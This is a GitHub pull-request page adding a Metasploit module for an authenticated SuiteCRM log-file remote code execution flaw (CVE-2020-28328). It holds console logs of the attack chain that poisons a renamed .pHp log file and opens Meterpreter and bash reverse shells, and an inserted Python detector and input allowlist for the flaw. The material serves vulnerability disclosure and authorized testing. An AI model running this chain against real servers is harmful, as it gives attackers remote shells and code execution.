
Added module and documentation for SuiteCRM Log File RCE CVE-2020-28328 #15231

Merged
merged 19 commits into from
Jun 3, 2021

Conversation

mcorybillington

Hello, this is my first PR, so please go easy on me.

I am submitting a module for an exploit I reported (two, technically) to SuiteCRM. The exploit allows for an administrator to modify system settings and control the name of the log file. The attacker can rename the log file to a PHP file and then poison the file with arbitrary PHP code. This code is sanitized to a degree, so the PHP code you can execute is limited; hence I have only two payloads added: linux/x64/meterpreter_reverse_tcp and cmd/unix/bash_reverse_tcp.

This module will cover CVE-2020-28328 as well; however, I am still waiting for the current CVE. This was patched in the latest release in April 2021. I requested the CVE ID from the vendor today, and they advised that they have not received it yet from Mitre.

A writeup can be found here:
https://theyhack.me/SuiteCRM-RCE-2/

And a previous writeup/exploit can be found here for the first issue:
https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/
https://www.exploit-db.com/exploits/49001

Verification

List the steps needed to make sure this thing works.

This is a full run-through with both modules.

msf6 > use exploit/linux/http/suitecrm_log_file_rce
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/suitecrm_log_file_rce) > set RHOSTS 192.168.122.29
RHOSTS => 192.168.122.29
msf6 exploit(linux/http/suitecrm_log_file_rce) > set USER admin
USER => admin
msf6 exploit(linux/http/suitecrm_log_file_rce) > set PASS admin
PASS => admin
msf6 exploit(linux/http/suitecrm_log_file_rce) > set SRVHOST 192.168.122.125
SRVHOST => 192.168.122.125
msf6 exploit(linux/http/suitecrm_log_file_rce) > set LHOST 192.168.122.125
LHOST => 192.168.122.125
msf6 exploit(linux/http/suitecrm_log_file_rce) > check

[*] Authenticating as admin
[+] Authenticated as: admin
[+] admin has administrative rights.
[+] SuiteCRM Version 7.11.18
[*] 192.168.122.29:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/suitecrm_log_file_rce) > exploit

[*] Started reverse TCP handler on 192.168.122.125:4444 
[*] Using URL: http://192.168.122.125:8080/NzzKmKY
[*] Authenticating as admin
[+] Authenticated as: admin
[+] admin has administrative rights.
[*] Modifying systems setting file
[*] Poisoning log file
[*] Executing php code in log file: fxg8pi1C.pHp
[+] 192.168.122.29:80 - Payload sent!
[*] Meterpreter session 1 opened (192.168.122.125:4444 -> 192.168.122.29:43346) at 2021-05-21 22:52:15 -0500
[*] Restoring log file to default configuration
[*] Server stopped.
[!] This exploit may require manual cleanup of 'fxg8pi1C.pHp' on the target
[!] This exploit may require manual cleanup of '/tmp/9yCGovF5' on the target

meterpreter > getuid
Server username: daemon @ bb77d61a4df1 (uid=1, gid=1, euid=1, egid=1)
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.21.0.3 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(linux/http/suitecrm_log_file_rce) > sessions -i

Active sessions
===============

No active sessions.

msf6 exploit(linux/http/suitecrm_log_file_rce) > set target 1
target => 1
msf6 exploit(linux/http/suitecrm_log_file_rce) > run

[*] Started reverse TCP handler on 192.168.122.125:4444 
[*] Using URL: http://192.168.122.125:8080/Kle8QoPV
[*] Authenticating as admin
[+] Authenticated as: admin
[+] admin has administrative rights.
[*] Modifying systems setting file
[*] Poisoning log file
[*] Executing php code in log file: 1cOyYGE3.pHp
[+] 192.168.122.29:80 - Payload sent!
[*] Command shell session 2 opened (192.168.122.125:4444 -> 192.168.122.29:43366) at 2021-05-21 22:53:03 -0500
[*] Restoring log file to default configuration
[*] Server stopped.
[!] This exploit may require manual cleanup of '1cOyYGE3.pHp' on the target

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
whoami
daemon
exit
[*] 192.168.122.29 - Command shell session 2 closed.

I will be emailing a run-through of each section as well to msfdev@metasploit.com.


bcoles commented May 22, 2021

> The exploit allows for an administrator to modify system settings and control the name of the log file. The attacker can rename the log file to a PHP file and then poison the file with arbitrary PHP code.

lol. Seems like a regression of the same issue in the same logger_file_name parameter from 9 years ago.


@space-r7 space-r7 left a comment


Hey @mcorybillington, thank you for the module! I have a few suggestions, with most being related to checking / validating responses.

@space-r7 space-r7 self-assigned this May 25, 2021
mcorybillington and others added 5 commits May 27, 2021 11:59
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>

space-r7 commented Jun 2, 2021

Hey @mcorybillington, I added a PR to your branch with a couple of small changes. I went ahead and added those since I missed it in the review. Let me know if those work for you, thanks!


space-r7 commented Jun 3, 2021

Tested against 7.11.18 and works great. Congrats on the first module!

msf6 > use exploit/linux/http/suitecrm_log_file_rce 
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/suitecrm_log_file_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(linux/http/suitecrm_log_file_rce) > set lhost 192.168.37.75
lhost => 192.168.37.75
msf6 exploit(linux/http/suitecrm_log_file_rce) > set user user
user => user
msf6 exploit(linux/http/suitecrm_log_file_rce) > set pass bitnami
pass => bitnami
msf6 exploit(linux/http/suitecrm_log_file_rce) > run

[*] Started reverse TCP handler on 192.168.37.75:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Authenticating as user
[+] Authenticated as: user
[+] user has administrative rights.
[+] The target appears to be vulnerable. SuiteCRM 7.11.18
[*] Using URL: http://0.0.0.0:8080/qAHDVx
[*] Local IP: http://192.168.1.94:8080/qAHDVx
[*] Trying - Modify system settings file
[+] Succeeded - Modify system settings file
[*] Trying - Poison log file
[+] Succeeded - Poison log file
[*] Executing php code in log file: 07l5jS2M.pHp
[+] 127.0.0.1:80 - Payload sent!
[*] Meterpreter session 1 opened (192.168.37.75:4444 -> 192.168.37.75:54639) at 2021-06-03 09:09:01 -0500
[*] Trying - Restore logging to default configuration
[+] Succeeded - Restore logging to default configuration
[*] Server stopped.
[!] This exploit may require manual cleanup of '07l5jS2M.pHp' on the target
[!] This exploit may require manual cleanup of '/tmp/dGlRluy4' on the target

meterpreter > getuid
Server username: daemon @ 14f6fcbd2446 (uid=1, gid=1, euid=1, egid=1)
meterpreter > sysinfo
Computer     : 172.18.0.3
OS           : Debian 10.9 (Linux 5.10.25-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@space-r7 space-r7 merged commit 8b737c2 into rapid7:master Jun 3, 2021

space-r7 commented Jun 3, 2021

Release Notes

New module exploit/linux/http/suitecrm_log_file_rce targets SuiteCRM versions 7.11.18 and below. An authenticated user can rename the SuiteCRM log file to have an extension of .pHp. The log file can then be poisoned with arbitrary PHP code by modifying user account information, such as the user's last name. Authenticated code execution is then achieved by requesting the log file.
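The chain in the release notes (rename the log file to a mixed-case .pHp name, poison it, then request it) leaves two things a defender can check for. The example below is added here and is not part of the PR or the module: it flags access-log requests for PHP-handled extensions that are not all lowercase (the module's run above requests fxg8pi1C.pHp), and it shows an allowlist check for the submitted logger_file_name value that can only ever produce a .log file. The access-log lines are constructed samples, and the regexes and function names are this example's own assumptions.

```python
import re
from typing import Dict, List, Optional

# Constructed sample Apache access-log lines (not taken from the PR). The second
# line mirrors the request the module makes: a GET for the renamed log file
# with a mixed-case .pHp extension.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [21/May/2021:22:52:14 -0500] "GET /index.php?module=Home HTTP/1.1" 200 4096',
    '10.0.0.5 - - [21/May/2021:22:52:15 -0500] "GET /fxg8pi1C.pHp HTTP/1.1" 200 512',
    '10.0.0.9 - - [21/May/2021:22:55:00 -0500] "GET /cache/images/logo.png HTTP/1.1" 200 2048',
    '10.0.0.9 - - [21/May/2021:22:55:01 -0500] "GET /suitecrm.log HTTP/1.1" 403 199',
]

REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PHP_EXT_RE = re.compile(r'\.(php\d?|phtml|phar)$', re.IGNORECASE)


def parse_request(line: str) -> Optional[Dict[str, str]]:
    """Pull client, method, path and status out of one combined-format line."""
    m = REQUEST_RE.search(line)
    return m.groupdict() if m else None


def is_case_variant_php(path: str) -> bool:
    """True when the requested file ends in a PHP-handled extension that is not
    all lowercase (.pHp, .PHP, .Php5 ...). SuiteCRM's own scripts use lowercase
    .php, so a mixed-case hit is a strong signal that a renamed log file is
    being requested, as in the PR's run."""
    basename = path.split('?', 1)[0].rsplit('/', 1)[-1]
    m = PHP_EXT_RE.search(basename)
    return bool(m) and m.group(0) != m.group(0).lower()


def suspicious_requests(lines: List[str]) -> List[Dict[str, str]]:
    """Return the parsed requests that hit a case-variant PHP extension."""
    hits = []
    for line in lines:
        req = parse_request(line)
        if req and is_case_variant_php(req['path']):
            hits.append(req)
    return hits


def is_safe_logger_file_name(name: str) -> bool:
    """Allowlist check for the value an admin submits as the log file name
    (the logger_file_name field mentioned in the review): letters, digits,
    '_' and '-' only, so the file written can only ever be '<name>.log'.
    Rejects dots (no extension change), slashes (no traversal) and empty input."""
    return re.fullmatch(r'[A-Za-z0-9_-]{1,64}', name) is not None
```

Run the detector over a real access log by reading it line by line into suspicious_requests; the allowlist check is the shape of validation the application side should apply before writing the setting.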

@space-r7 space-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 3, 2021